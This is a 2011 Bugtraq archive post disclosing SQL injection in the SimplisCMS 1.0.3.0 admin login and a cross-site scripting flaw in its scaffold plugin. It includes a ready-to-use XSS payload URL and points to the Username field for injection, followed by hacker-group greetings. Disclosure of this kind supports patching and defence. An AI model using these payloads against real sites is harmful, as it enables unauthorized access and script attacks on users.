Bugtraq mailing list archives
SimplisCMS 1.0.3.0 SQL injection / Cross Site Scripting
From: root () d99y com
Date: Sat, 26 Mar 2011 21:46:35 -0600
########################################################## # Exploit Title: SimplisCMS 1.0.3.0 SQL injection / Cross Site Scripting # home : http://www.D99Y.com # Date: 27/3/2011 # Author: NassRawI # Software Link: http://modcove.com/index.php # Demo : http://modcove.com/index.php?page=demo # Version: 1.0.3.0 ########################################################## # # [1] SQL injection # # http://localhost/simpliscms/admin/index.php # # # Injection in the Username field # # # [2] Cross Site Scripting # # file : # # admin/application/plugins/scaffold/index.php # # exploit : # # http://localhost/simpliscms/admin/application/plugins/scaffold/index.php?f=[ XSS ] # # http://localhost/simpliscms/admin/application/plugins/scaffold/index.php?f=<FONT size=7 >NassRaWi</FONT> <script>alert("www.d99y.com")</script> # # ########################################################## Greetz : D99Y Team + alroo7 alte No Tkd3 + oхіјєή + ǺŁṀṨŘŎŎŖĨ + JEenY + anT!-Tr0J4n + ReBLOoOV + FoFo < x-shadow my baby :$ + ‏Difficult 511 and all members D99Y.CoM Enjoy :)
Current thread:
- SimplisCMS 1.0.3.0 SQL injection / Cross Site Scripting root (Mar 28)